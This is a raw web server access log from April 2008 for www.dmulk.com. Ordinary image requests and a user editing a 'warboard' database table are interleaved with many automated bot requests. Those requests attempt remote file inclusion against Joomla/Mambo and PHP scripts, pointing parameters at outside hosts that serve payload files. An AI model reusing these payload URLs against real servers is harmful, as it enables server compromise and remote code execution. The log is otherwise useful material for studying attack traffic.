85.25.152.14 - - [29/Apr/2008:10:15:45 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
159.27.254.222 - - [29/Apr/2008:10:15:45 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4387M.JPG HTTP/1.0" 200 63059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
159.27.254.222 - - [29/Apr/2008:10:15:45 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4386M.JPG HTTP/1.0" 200 70821 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
193.200.113.18 - - [29/Apr/2008:10:15:45 -0700] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.152.14 - - [29/Apr/2008:10:15:45 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
159.27.254.222 - - [29/Apr/2008:10:15:45 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4382M.JPG HTTP/1.0" 200 88270 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
193.200.113.18 - - [29/Apr/2008:10:15:47 -0700] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.132.204.166 - - [29/Apr/2008:10:15:50 -0700] "GET /logs/access_080201.log//includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.200.113.18 - - [29/Apr/2008:10:15:51 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:15:51 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
193.200.113.18 - - [29/Apr/2008:10:15:52 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.0.130 - - [29/Apr/2008:10:15:58 -0700] "GET /logs/errors.php?error=http://thetestingcompany.com//images/stories/a2id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.0.130 - - [29/Apr/2008:10:15:58 -0700] "GET /errors.php?error=http://thetestingcompany.com//images/stories/a2id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.75.216.189 - - [29/Apr/2008:10:16:14 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.216.189 - - [29/Apr/2008:10:16:14 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.133.173 - - [29/Apr/2008:10:16:14 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.taow.net/league/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.132.204.166 - - [29/Apr/2008:10:16:25 -0700] "GET /logs/access_080201.log//includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.145.28.20 - - [29/Apr/2008:10:16:28 -0700] "GET /logs/access_080229.log/?mosConfig_absolute_path=http://www.taow.net/league/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.141.117.79 - - [29/Apr/2008:10:16:35 -0700] "GET /logs/access.log/page.php5?id=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.117.79 - - [29/Apr/2008:10:16:36 -0700] "GET /page.php5?id=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.117.79 - - [29/Apr/2008:10:16:36 -0700] "GET /logs/page.php5?id=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.8.232.250 - - [29/Apr/2008:10:16:38 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 401 395 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [29/Apr/2008:10:16:41 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33030 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [29/Apr/2008:10:16:41 -0700] "GET /warboard/css/styles_screen.css HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [29/Apr/2008:10:16:41 -0700] "GET /warboard/css/styles_print.css HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [29/Apr/2008:10:16:41 -0700] "GET /warboard/images/update.gif HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [29/Apr/2008:10:16:41 -0700] "GET /warboard/images/delete.gif HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [29/Apr/2008:10:16:41 -0700] "GET /warboard/images/details.gif HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
85.114.133.81 - - [29/Apr/2008:10:16:44 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.teploobmen.ru/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.8.232.250 - warboard [29/Apr/2008:10:16:49 -0700] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=613 HTTP/1.1" 200 7618 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:16:49 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:16:49 -0700] "GET //skin/zero_vote/error.php?dir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.34.200.250 - - [29/Apr/2008:10:16:49 -0700] "GET /logs/access_080218.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.235.247.137 - - [29/Apr/2008:10:16:59 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.235.247.137 - - [29/Apr/2008:10:16:59 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.235.247.137 - - [29/Apr/2008:10:17:05 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.235.247.137 - - [29/Apr/2008:10:17:06 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.235.247.137 - - [29/Apr/2008:10:17:07 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.235.247.137 - - [29/Apr/2008:10:17:07 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:10:17:19 -0700] "GET /logs/cyberfolio/portfolio/msg/view.php?av=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:10:17:19 -0700] "GET /cyberfolio/portfolio/msg/view.php?av=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
68.8.232.250 - warboard [29/Apr/2008:10:17:37 -0700] "POST /warboard/index.php?table_name=warboard_main&page=0&function=update&where_field=dataid&where_value=613 HTTP/1.1" 302 2906 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=613" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [29/Apr/2008:10:17:37 -0700] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=613&just_updated=1 HTTP/1.1" 200 7655 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=613" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [29/Apr/2008:10:17:41 -0700] "GET /warboard/index.php?table_name=warboard_main HTTP/1.1" 200 32998 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=613&just_updated=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [29/Apr/2008:10:17:46 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC HTTP/1.1" 200 32960 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
85.17.1.143 - - [29/Apr/2008:10:17:46 -0700] "GET /logs/access_080227.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.studio-wave.com/tsu/styel.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.1.143 - - [29/Apr/2008:10:17:47 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.studio-wave.com/tsu/styel.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.1.143 - - [29/Apr/2008:10:17:47 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.studio-wave.com/tsu/styel.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.8.232.250 - warboard [29/Apr/2008:10:17:48 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33029 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [29/Apr/2008:10:17:56 -0700] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=613 HTTP/1.1" 200 7623 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
85.234.133.173 - - [29/Apr/2008:10:18:03 -0700] "GET /logs/access_080225.log/administrator/components/com_pollxt/conf.pollxt.php?GLOBALS[mosConfig_absolute_path]=http://www.taow.net/league/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Apr/2008:10:18:03 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?GLOBALS[mosConfig_absolute_path]=http://www.taow.net/league/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Apr/2008:10:18:03 -0700] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?GLOBALS[mosConfig_absolute_path]=http://www.taow.net/league/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
68.8.232.250 - warboard [29/Apr/2008:10:18:04 -0700] "POST /warboard/index.php?table_name=warboard_main&page=0&function=update&where_field=dataid&where_value=613 HTTP/1.1" 302 2906 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=613" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [29/Apr/2008:10:18:04 -0700] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=613&just_updated=1 HTTP/1.1" 200 7660 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=613" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [29/Apr/2008:10:18:05 -0700] "GET /warboard/index.php?table_name=warboard_main HTTP/1.1" 200 32998 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=613&just_updated=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [29/Apr/2008:10:18:08 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC HTTP/1.1" 200 32960 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
85.114.133.81 - - [29/Apr/2008:10:18:08 -0700] "GET /logs/access.log/page.php5?id=http://www.teploobmen.ru/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [29/Apr/2008:10:18:09 -0700] "GET /page.php5?id=http://www.teploobmen.ru/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [29/Apr/2008:10:18:09 -0700] "GET /logs/page.php5?id=http://www.teploobmen.ru/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.8.232.250 - warboard [29/Apr/2008:10:18:10 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33028 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
64.34.200.250 - - [29/Apr/2008:10:18:44 -0700] "GET /logs/access_080218.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.34.200.250 - - [29/Apr/2008:10:18:47 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
64.34.200.250 - - [29/Apr/2008:10:18:48 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45276 "-" "libwww-perl/5.810" "www.dmulk.com"
64.34.200.250 - - [29/Apr/2008:10:18:49 -0700] "GET /logs/access_080218.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.34.200.250 - - [29/Apr/2008:10:18:53 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
207.130.52.36 - - [29/Apr/2008:10:18:53 -0700] "GET /bikes/dteel/2008_02_23/IMG_4573s.JPG HTTP/1.1" 200 240669 "http://www.st-owners.com/forums/showthread.php?t=32353&page=4" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
64.34.200.250 - - [29/Apr/2008:10:18:53 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45276 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:19:08 -0700] "GET /logs/access_080329.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:19:11 -0700] "GET /logs/access_080329.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:10:19:17 -0700] "GET /logs/access_080329.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
193.54.123.216 - - [29/Apr/2008:10:19:22 -0700] "GET /logs/access_080312.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.54.123.216 - - [29/Apr/2008:10:19:22 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.54.123.216 - - [29/Apr/2008:10:19:22 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.8.232.250 - warboard [29/Apr/2008:10:19:23 -0700] "GET /warboard/index.php?table_name=warboard_main HTTP/1.1" 200 32998 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
193.54.123.216 - - [29/Apr/2008:10:19:24 -0700] "GET /logs/access_080312.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.54.123.216 - - [29/Apr/2008:10:19:24 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.54.123.216 - - [29/Apr/2008:10:19:24 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.155 - - [29/Apr/2008:10:19:49 -0700] "GET /logs/public_html/includes/joomla.php?main=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
68.8.232.250 - warboard [29/Apr/2008:10:19:50 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC HTTP/1.1" 200 32960 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [29/Apr/2008:10:19:51 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33028 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
200.93.147.155 - - [29/Apr/2008:10:20:02 -0700] "GET /public_html/includes/joomla.php?main=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
66.193.60.15 - - [29/Apr/2008:10:20:02 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [29/Apr/2008:10:20:03 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.193.60.15 - - [29/Apr/2008:10:20:03 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [29/Apr/2008:10:20:03 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.30.73.117 - - [29/Apr/2008:10:20:04 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.30.73.117 - - [29/Apr/2008:10:20:04 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.47.36.29 - - [29/Apr/2008:10:20:07 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.47.36.29 - - [29/Apr/2008:10:20:08 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.47.36.29 - - [29/Apr/2008:10:20:08 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.47.36.29 - - [29/Apr/2008:10:20:14 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.47.36.29 - - [29/Apr/2008:10:20:14 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.47.36.29 - - [29/Apr/2008:10:20:15 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.30.73.117 - - [29/Apr/2008:10:20:18 -0700] "GET /logs/scanhttp://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.30.73.117 - - [29/Apr/2008:10:20:18 -0700] "GET /scanhttp://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.235.247.137 - - [29/Apr/2008:10:20:30 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.235.247.137 - - [29/Apr/2008:10:20:30 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.235.247.137 - - [29/Apr/2008:10:20:30 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.235.247.137 - - [29/Apr/2008:10:20:31 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.235.247.137 - - [29/Apr/2008:10:20:31 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.235.247.137 - - [29/Apr/2008:10:20:31 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.47.36.29 - - [29/Apr/2008:10:20:47 -0700] "GET /logs/access_080305.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.47.36.29 - - [29/Apr/2008:10:20:52 -0700] "GET /logs/access_080305.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.235.247.137 - - [29/Apr/2008:10:21:10 -0700] "GET /logs/access_080305.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
